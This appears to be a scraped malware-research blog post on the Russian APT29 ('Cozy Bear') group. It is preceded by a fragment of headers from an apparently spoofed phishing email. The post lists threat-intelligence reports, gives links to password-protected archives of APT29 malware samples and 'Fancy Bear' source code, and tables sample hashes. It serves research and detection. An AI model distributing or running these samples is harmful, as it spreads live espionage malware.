<span style="font-family: inherit;"> 571CD1511D4;<span style="white-space: pre;"> </span>Thu, 12 Oct 2017 06:43:35 -0400 (EDT)</span></div>
<div class="p2">
<span style="font-family: inherit;">From: Emmanuel Chatta <Emmanuel.Chatta@stadnardbank.co.za></span></div>
<div class="p2">
<span style="font-family: inherit;">To: <snip></span></div>
<div class="p2">
<span style="font-family: inherit;">Subject: Document</span></div>
<div class="p2">
<span style="font-family: inherit;">Thread-Topic: Document</span></div>
<div class="p2">
<span style="font-family: inherit;">Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==</span></div>
<div class="p2">
<span style="font-family: inherit;">Date: Thu, 12 Oct 2017 10:43:35 +0000</span></div>
<div class="p2">
<span style="font-family: inherit;">Message-ID: <f8c34a32397e02274fd65930045f0204@ssl-secure-mail.com></span></div>
<div class="p2">
<span style="font-family: inherit;">Content-Language: en-US</span></div>
<div class="p2">
<span style="font-family: inherit;">X-MS-Exchange-Organization-AuthSource: <snip></span></div>
<div class="p2">
<span style="font-family: inherit;">X-MS-Has-Attach: yes</span></div>
<div class="p2">
<span style="font-family: inherit;">X-MS-TNEF-Correlator:</span></div>
<div class="p2">
<span style="font-family: inherit;"><span style="color: red;">received-spf: Fail </span>(protection.outlook.com: domain of <snip> does</span></div>
<div class="p2">
<span style="font-family: inherit;"> not designate <span style="color: red;">147.152.120.47</span> as permitted sender)</span></div>
<div class="p2">
<span style="font-family: inherit;"> receiver=protection.outlook.com; client-ip=147.152.120.47;</span></div>
<div class="p2">
<span style="font-family: inherit;"> helo=<snip>;</span></div>
<div class="p2">
<span style="font-family: inherit;">x-scanned-by: MailControl 44278.1987 (www.mailcontrol.com) on 10.65.1.124</span></div>
<div class="p2">
<span style="font-family: inherit;">x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx</span></div>
<div class="p2">
<span style="font-family: inherit;">x-ms-publictraffictype: Email</span></div>
<div class="p2">
<span style="font-family: inherit;">X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c</span></div>
<div class="p2">
<span style="font-family: inherit;">Content-Type: multipart/mixed;</span></div>
<div class="p2">
<span style="font-family: inherit;"><span style="white-space: pre;"> </span>boundary="_002_f8c34a32397e02274fd65930045f0204sslsecuremailcom_"</span></div>
<div class="p2">
<span style="font-family: inherit;">MIME-Version: 1.0</span></div>
<div>
<br /></div>
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo}
p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo; min-height: 13.0px}
span.Apple-tab-span {white-space:pre}
</style></div>
Milahttp://www.blogger.com/profile/09472209631979859691noreply@blogger.com2tag:blogger.com,1999:blog-7885177434994542510.post-9510567789820258312017-03-31T02:02:00.007-04:002023-01-22T02:04:34.636-05:00Part II. APT29 Russian APT including Fancy Bear<div dir="ltr" style="text-align: left;" trbidi="on"><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyNRAbT5bBUDwiUVq-5pTvxuDCkYbyDqC8KBKz1lV03GHXOEfnrZSatqbbmheJG0jN0ZqDhmfvH0gg3ROdGNnxVizxavlNyHeNOxf9S9CR-5WaW9RZ-qS6VVhV-p4gt0IlCwLocgz0gsW7B3AwQG8CzUHwf8ortvL_Z13Tk3FOHTYnXloX3W-q54bm/s1311/IMG_3420%20copy.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="1080" data-original-width="1311" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyNRAbT5bBUDwiUVq-5pTvxuDCkYbyDqC8KBKz1lV03GHXOEfnrZSatqbbmheJG0jN0ZqDhmfvH0gg3ROdGNnxVizxavlNyHeNOxf9S9CR-5WaW9RZ-qS6VVhV-p4gt0IlCwLocgz0gsW7B3AwQG8CzUHwf8ortvL_Z13Tk3FOHTYnXloX3W-q54bm/w293-h269/IMG_3420%20copy.jpg" width="293" /></a></div>This is the second part of Russian APT series.<br />"APT29 - The Dukes Cozy Bear: APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008.1210 This group reportedly compromised the Democratic National Committee starting in the summer of 2015" (src. <a href="https://attack.mitre.org/wiki/Groups#scite-a0b31520c0bb02f1e5e011f948303052">Mitre ATT&CK</a>)<br />
<br />
Please see the first post here: <a href="http://contagiodump.blogspot.com/2017/02/russian-apt-apt28-collection-of-samples.html">Russian APT - APT28 collection of samples including OSX XAgent</a><br />
<img border="0" data-pin-nopin="true" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background: rgb(255, 255, 255); border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; color: #274e13; font-family: "courier new", courier, monospace; line-height: 19.6px; padding: 0px; position: relative;" /><a href="https://www.dropbox.com/sh/zbfnop7sawizxhn/AACoRuTKzSOrO5WHjdCeWyfia?dl=0">Download</a> (matching research listed above). Email me if you need the password <br /><img border="0" data-pin-nopin="true" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9fekBavhMnuxb9txFvxkWzKz4DZBXwlXNpsm2_s6FKlTJngInQG_9h4amviU59zeRl61NodBmrkvhq-mtc9FDyOUGO8ZaBK-QZFXtHsqFqL0su0Z6rt5Hqpp8WElMdztahWYVyZ2dfdE/s1600/rednag.png" style="background: rgb(255, 255, 255); border: 1px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0) 1px 1px 5px; color: #274e13; font-family: "courier new", courier, monospace; line-height: 19.6px; padding: 0px; position: relative;" /><a href="http://contagio.deependresearch.org/APT/Russia/APT29_fancybear-master_passprotected.zip">Fancy_Bear_sourcecode</a> (also on<a href="https://github.com/rickey-g/fancybear"> Github</a>)</div><div dir="ltr" style="text-align: left;" trbidi="on"><br /><div dir="ltr" trbidi="on"><span style="font-family: verdana;"><div dir="ltr" trbidi="on"><a href="https://airtable.com/shr2iB6e8g1DLJKWH" style="color: #660000; font-size: 14px; text-decoration-line: none;" target="_blank">Malware Inventory (work in progress)</a></div></span></div><a name='more'></a><div dir="ltr" trbidi="on"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s43/ba.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><br class="Apple-interchange-newline" /><img border="0" data-original-height="43" data-original-width="43" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJHESQjb4GvEj6AjI4HC55tTnkwYW-_B-GCO9NpivJXIy79pDY_Fy6PvojJ1RFbVvANLrfaeCT6ABzXwqiD7l3WzX77v0AoI4-qStU8dxA98XDYPZvzj3xYsVoz8VlP65hIlJbeNGwRCIQ5ohW8D5Gpb1X-NvDixJ9b6TQwbdhGXsSyQ69SA4aRZIQ/s1600/ba.png" width="43" /></a><span style="font-family: verdana;">Links updated: Jan 22, 2023</span></div><div dir="ltr" trbidi="on"><span style="font-family: verdana;">If any links are down in the future, you <a href="http://contagio.deependresearch.org/read/APT29-reading.zip">download all articles from here </a></span></div><div dir="ltr" trbidi="on"><span style="font-family: verdana;"><div dir="ltr" trbidi="on"><a href="https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"></a></div><div dir="ltr" trbidi="on"><br /></div></span></div>
Resources:<br />
<div>
<ol style="text-align: left;">
<li><a href="https://attack.mitre.org/wiki/Groups#scite-a0b31520c0bb02f1e5e011f948303052">Mitre ATT&CK</a></li>
<li>2017-03 <a href="https://www.intelligence.senate.gov/sites/default/files/documents/os-trid-033017.pdf">Disinformation. A Primer In Russian Active Measures And Influence Campaigns. Hearings before the Select Committee on Intelligence, March 2017</a></li>
<li><a href="https://www.blackhat.com/docs/us-14/materials/us-14-Hypponen-Goverments-As-Malware-Authors.pdf">2014-08 Mikko Hipponen. Governments as Malware Authors. Presentation ppt.</a></li>
<li>2016. <a href="http://www.irongeek.com/i.php?page=videos/derbycon6/404-no-easy-breach-challenges-and-lessons-from-an-epic-investigation-matthew-dunwoody-nick-carr">No Easy Breach: Challenges and Lessons from an Epic Investigation. Mandiant. Matthew Dunwoody, Nick Carr. Video</a></li>
<li><a href="http://contagio.deependresearch.org/read/APT_Beyond+%E2%80%98Cyber+War+Russia%E2%80%99s+Use+ofStrategic+Cyber+Espionage+and+Information+Operations+in+Ukraine+by+Jen+WeedonCyberWarinPerspective_Weedon_08.pdf">Beyond ‘Cyber War’: Russia’s Use of Strategic Cyber Espionage and Information Operations in Ukraine. </a>NATO Cooperative Cyber Defence Centre of Excellence/ Fireeye - Jen Weedon</li>
</ol>
</div>
<div>
<br />
List of References (and samples mentioned) listed from oldest to newest:<br />
<br />
<ol style="text-align: left;">
<li><a href="https://s3.amazonaws.com/contagio.deependresearch.org/read/APT_2015_FSecure_CozyDuke.pdf">2012-02 FSecure. COZYDUKE</a></li>
<li><a href="http://www.crysys.hu/miniduke/miniduke_indicators_public.pdf">2013-02_Crysys_Miniduke Indicators</a></li>
<li><a href="http://contagio.deependresearch.org/read/APT_2013_MiniDuke_Paper_Final.pdf">2013-04_Bitdefender_A Closer Look at MiniDuke</a></li>
<li><a href="https://www.f-secure.com/weblog/archives/00002688.html">2014-04 FSecure_Targeted Attacks and Ukraine</a></li>
<li><a href="http://www.welivesecurity.com/2014/05/20/miniduke-still-duking/">2014-05_FSecure.Miniduke still duking it out</a></li>
<li><a href="https://securelist.com/blog/incidents/64107/miniduke-is-back-nemesis-gemina-and-the-botgen-studio/">2014-07_Kaspersky_Miniduke is back_Nemesis Gemina and the Botgen Studio</a></li>
<li><a href="https://securelist.com/blog/incidents/31112/the-miniduke-mystery-pdf-0-day-government-spy-assembler-0x29a-micro-backdoor/">2014-07_Kaspersky_The MiniDuke Mystery PDF 0-day</a></li>
<li><a href="https://www.f-secure.com/weblog/archives/00002764.html">2014-11_FSecure_OnionDuke APT Attacks Via the Tor Network</a></li>
<li><a href="http://contagio.deependresearch.org/read/APT_2015_fsecure_COSMICDUKE+Cosmu+with+a+twist+of+MiniDukecosmicduke_whitepaper.pdf">2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</a></li>
<li><a href="https://securelist.com/blog/research/69731/the-cozyduke-apt/">2015-04_Kaspersky_CozyDuke-CozyBear</a></li>
<li><a href="http://contagio.deependresearch.org/read/APT_2015_Duke+APT+Group%E2%80%99s+Latest+Tools-+Cloud+Services+and+Linux+Support.pdf">2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support</a></li>
<li><a href="http://contagio.deependresearch.org/read/APT_Fireeye_rpt-apt29-hammertoss-1-1.pdf">2015-07_Fireeye_Hammertoss_Stealthy_tactics_define_Russian_Cyber</a></li>
<li><a href="https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/">2015-07_Kaspersky_Minidionis one more APT with a usage of cloud drives</a></li>
<li><a href="http://contagio.deependresearch.org/read/APT_2015_Tracking+MiniDionis_+CozyCar%E2%80%99s+New+Ride+Is+Related+to+Seaduke.pdf">2015-07_PaloAlto_Tracking_MiniDionis</a></li>
<li><a href="http://researchcenter.paloaltonetworks.com/2015/07/unit-42-technical-analysis-seaduke/">2015-07_Palo_Alto_Unit 42 Technical Analysis Seaduke</a></li>
<li><a href="https://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory">2015-07_Symantec_Seaduke latest weapon in the Duke armory</a></li>
<li><a href="http://malware.prevenity.com/2015/08/wykradanie-danych-z-instytucji.html">2015-08_Prevenity Stealing data from public institutions</a></li>
<li><a href="https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf">2015-09_FSecure_THE DUKES7 years of Russian cyberespionage</a></li>
<li>2016-06_<a href="http://contagio.deependresearch.org/read/APT_2016_Crowdstrike_Bears+in+the+Midst+Intrusion+into+the+Democratic+National+Committee+%C2%BB.pdf">Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee</a> (<a href="http://contagio.deependresearch.org/read/APT_Crowdstrike_Our+Work+with+the+DNC_+Setting+the+record+straight.pdf">Updated version is here</a>)</li>
<li><a href="https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/">2016-11_Volexity_PowerDukePostElection</a></li>
<li><a href="http://contagio.deependresearch.org/read/APT_2016_Grizzly+Steppe_+Lighting+up+Like+A+Christmas+Tree+%E2%80%93+Fauie+Technology.pdf">2016-12_Chris_Grizzly SteppeLighting up Like A Christmas Tree</a></li>
<li><a href="https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html">2017-03 Fireeye APT29 Domain Fronting With TOR</a></li>
<li><a href="https://github.com/rickey-g/fancybear">Fancy Bear source code </a> (<a href="http://contagio.deependresearch.org/APT/Russia/APT29_fancybear-master_passprotected.zip">download code here if the github link goes down</a>)</li>
</ol>
<div>
<div> </div><div>
<div style="background-color: white;">
<div style="background-color: #618f2b; color: white; font-family: "trebuchet ms", trebuchet, sans-serif; font-size: 14px; line-height: 19px; text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace;"><b>Sample list</b></span></div>
<div>
<div style="text-align: left;">
<span style="font-family: "times" , "times new roman" , serif; font-size: x-small;"><br /></span></div>
</div>
<div>
<div class="samplearea" style="border: 0px; color: #1c1c1c; font-stretch: inherit; line-height: inherit; margin: 0px 0px 2em; padding: 0px; text-align: center; vertical-align: baseline;">
<table class="tableizer-table" style="border: 1px solid rgb(204, 204, 204); margin: 0px auto; text-align: left;"><thead>
<tr class="tableizer-firstrow"><th style="background-color: #104e8b; color: white; text-align: left;"><span style="font-family: inherit; font-size: x-small;">Parent Folder</span></th><th style="background-color: #104e8b; color: white; text-align: left;"><span style="font-family: inherit; font-size: x-small;">File Name</span></th><th style="background-color: #104e8b; color: white; text-align: left;"><span style="font-family: inherit; font-size: x-small;">MD5 Checksum</span></th><th style="background-color: #104e8b; color: white; text-align: left;"><span style="font-family: inherit; font-size: x-small;">SHA256 Checksum</span></th></tr>
</thead><tbody>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2012-02_FSecure_Cozyduke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2012-02_FSecure_Cozyduke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">00F67DEB6E435C68F8A39336C9EFFC45D395B134</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6761106f816313394a653db5172dc487</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">37ceea0922d1177a9de74f4858678acf6afd22706489fcca35a509bca9688cb7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">01D3973E1BB46E2B75034736991C567862A11263</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5b4250a6bb4c6915ce962d489ee912d6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">637cabc343e3ed5b447dccb13aa7caf4d3a3eb3cd617d360167f270ec34596ea</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">04AEFBF1527536159D72D20DEA907CBD080793E3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1a42acbdb285a7fba17f95068822ea4e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4464c945c88ac9a4a22e86f0922f18c164e87f26c3f3fa054eb488fdd7d4bfc8</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">210BC99275368DF7EA179055737CFFC3A12A6614</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d9703d014c5d4f55e2996f3573544476</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f16cfb7e54a11689fc1a37145b7ff28f17a1930c74324650e9a080ac87d69ac7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">23E20C523B9970686D913360D438C88E6067C157</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f0a6436ffee12558a434a0fc24b3b33f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5f827730c7bd155997121f023ca9775077a37a58111738fcb3213757170bd860</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">29A91E7823046F4EC3FD6B3FD1B442EAA92F3565</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">52474b705610245f67bbd1c86ab8bd7b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f9987e6be134bf29458a336a76600a267e14b07a57032b6a8fc656f750e40ce5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">31163D35C5A3CAA5E82E1D9B0D1B4DB8FBDD79FA</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9f612661000605c5d0787fe13746e4cc</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">363bf9a64718ae7af673f199b04b90abd5196b176932091927f6386271912442</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">32B0C8C46F8BAABA0159967C5602F58DD73EBDE9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0e0182694c381f8b68afc5f3ff4c4653</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c1b19af1e354f13c90163780be6ad50f02d5bf8bac1c9cc1eab1377a159de1be</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">33BEB7A410F1CD699733000B5B30B5E4EB2062BA</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">330ed7549d50bdb56497a5577132610a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">907a743b5d1d028f9bfb5f053311b0f8be8516cb97dbc48ac0511de9c41d3c32</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3583647EF8158E29E3C18413ECE70C2851720926</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">992d2386998566a2a95c2affbfe3f3fe</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">73b7d89340126a441e483229deefb017c8c680d0c8f571c55744e6141576f68a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">42CFE068B0F476198B93393840D400424FD77F0C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d596827d48a3ff836545b3a999f2c3e3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0dc7438be5b21a36651de0a08361b18d76f0920517a7d51f75dc234740f392ca</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">443BC2E77B10AE64AF6321C2C7BFD311C0772503</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b4ae6966e65e47afa41610b1fb554607</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b75cc5e0ad70347b3fad6c3e3b6b2bd224ec75e6ea9c906f01b53af58b52f038</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">44406A80F13045442CE6A28EE62A923AC8F8C56A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">01a2c13c42f1a0557421d341f4165423</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7188e3a11c12e48098fb24aa288068ff5dabeff8ba88b138c20811ef751d5f07</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">482D1624F9450CA1C99926CEEC2606260E7CE544</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fd8e27f820bdbdf6cb80a46c67fd978a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f7f4d18dbc0b822b89ba14ffea24114f92b593be0f287f300bb269b310883039</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">49FB759D133EEAAB3FCC78CEC64418E44ED649AB</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">08709ef0e3d467ce843af4deb77d74d5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bc7bcb663477238508ce8ad366cc9a77811c7f5eabaec47175858fe972639f40</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4A16674C799FAE6535C82F878F6A37F94EE9A49B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5fa3c3dabb8edd601302d9cf02db899d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0d5d39ad12361b6ea6b3856e55a63cad4611c7b49795b1f2a517621de298e4fa</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5150174A4D5E5BB0BCCC568E82DBB86406487510</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2ef51f1ca11ce73fa20b54a5886ad1dd</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">89996b66d5a339939b2072d29675ec3ca6d793f42a5d335a8ea7dab8773321ef</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5BCD74E0C3C661580201E7D8122D7525A1480B4C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">859f167704b5c138ed9a9d4d3fdc0723</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f99efa337e1b7cef4e68570a23da9183526c3db72c6410d41f63e38c8b515466</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CozyDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5FFE420A3CC848024884DB8E2CFED68C47368DAE</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5eabc9c54b73fffb5f3fddb37a653d7b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9d047bd757faff57539c885d46fdf8e7db383d850b355d7a829a203c9184def4</span></td></tr>
